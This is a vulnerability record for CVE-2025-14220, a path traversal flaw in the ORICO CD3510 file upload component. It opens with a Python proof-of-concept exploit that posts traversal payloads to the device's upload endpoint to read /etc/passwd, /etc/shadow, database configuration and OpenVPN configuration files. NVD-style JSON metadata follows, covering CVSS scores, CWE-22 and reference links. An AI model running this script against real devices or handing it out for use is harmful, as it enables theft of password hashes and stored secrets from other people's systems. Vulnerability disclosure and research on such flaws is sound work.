CVE-2025-14220

import requests import urllib.parse # CVE-2025-14220 PoC - ORICO CD3510 Path Traversal # Target: ORICO CD3510 device with file upload component target = "http://target-device:8080" def read_file_via_path_traversal(filepath): """ Exploit path traversal in file upload component to read arbitrary files """ # Path traversal payload to read /etc/passwd traversal_path = f"../../../../../../{filepath}" endpoint = f"{target}/api/upload" files = { 'file': ('test.txt', 'test content', 'text/plain') } data = { 'path': traversal_path, 'filename': 'malicious.txt' } try: response = requests.post(endpoint, files=files, data=data, timeout=10) if response.status_code == 200: print(f"[+] Successfully exploited path traversal") print(f"[+] File content: {response.text}") return True else: print(f"[-] Exploitation failed: HTTP {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False def main(): print("="*50) print("CVE-2025-14220 PoC - ORICO CD3510 Path Traversal") print("="*50) # Read sensitive files target_files = [ '/etc/passwd', '/etc/shadow', '/app/config/database.conf', '/etc/openvpn/*.conf' ] for file_path in target_files: print(f"\n[*] Attempting to read: {file_path}") read_file_via_path_traversal(file_path) if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-14220", "sourceIdentifier": "[email protected]", "published": "2025-12-08T07:15:56.767", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security vulnerability has been detected in ORICO CD3510 1.9.12. This affects an unknown function of the component File Upload. The manipulation leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N", "baseScore": 4.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "NONE"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 2.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://vuldb.com/?ctiid.334662", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.334662", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.701302", "source": "[email protected]"}, {"url": "https://www.notion.so/2b66cf4e528a8002aa39df57a71b105a", "source": "[email protected]"}]}}